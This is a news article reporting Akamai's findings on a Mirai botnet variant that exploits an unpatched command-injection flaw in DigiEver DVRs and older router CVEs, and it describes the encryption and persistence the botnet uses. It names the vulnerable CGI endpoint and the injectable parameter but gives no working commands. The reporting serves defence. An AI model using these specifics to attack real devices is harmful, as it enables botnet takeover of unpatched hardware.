New Mirai Botnet Exploits Zero-Day Vulnerability in DigiEver DVRs
Cybersecurity researchers have uncovered a new botnet, based on the Mirai framework, which actively exploits a zero-day remote code execution vulnerability in DigiEver DS-2105 Pro DVR devices. As this vulnerability remains unpatched and has not yet been assigned a CVE identifier, it leaves the affected devices as easy targets for attackers.
The cyberattack began in October, targeting various network video recorders and TP-Link routers running outdated firmware. One of the vulnerabilities exploited during the campaign was presented by TXOne researcher Ta-Lun Yen at the DefCamp conference in Bucharest. According to his findings, the flaw impacts numerous DVR devices.
Akamai specialists detected active exploitation of this vulnerability starting in mid-November, though evidence suggests that the attacks likely commenced as early as September. Alongside DigiEver devices, the botnet also leverages vulnerabilities such as CVE-2023-1389 in TP-Link devices and CVE-2018-17532 in Teltonika RUT9XX routers.
The DigiEver vulnerability involves a flaw in processing the URI /cgi-bin/cgi_main.cgi, where user input is insufficiently validated. This oversight allows unauthenticated attackers to remotely inject commands, such as curl and chmod, through HTTP request parameters like the ntp field.
Hackers exploit command injection to download malicious payloads from external servers, after which the compromised devices join the botnet. To maintain persistent access, cron jobs are added to the devices. These compromised systems are subsequently used to conduct DDoS attacks or further propagate the botnet.
The new variant of Mirai stands out due to its use of XOR and ChaCha20 encryption, as well as support for multiple architectures, including x86, ARM, and MIPS. Akamai analysts believe this indicates a growing sophistication in the tactics employed by botnet operators.
While many botnets still rely on the original encryption algorithms from Mirai’s initial source code, advanced techniques like ChaCha20 highlight the escalating threat level. The Akamai report provides indicators of compromise (IoCs) and Yara rules to aid in detecting and mitigating this evolving threat.
Modern botnets exemplify increasing complexity and adaptability, turning each vulnerability into a powerful weapon for large-scale attacks. Building a robust digital defense requires not only timely updates but also proactive threat analysis to stay ahead of adversaries.
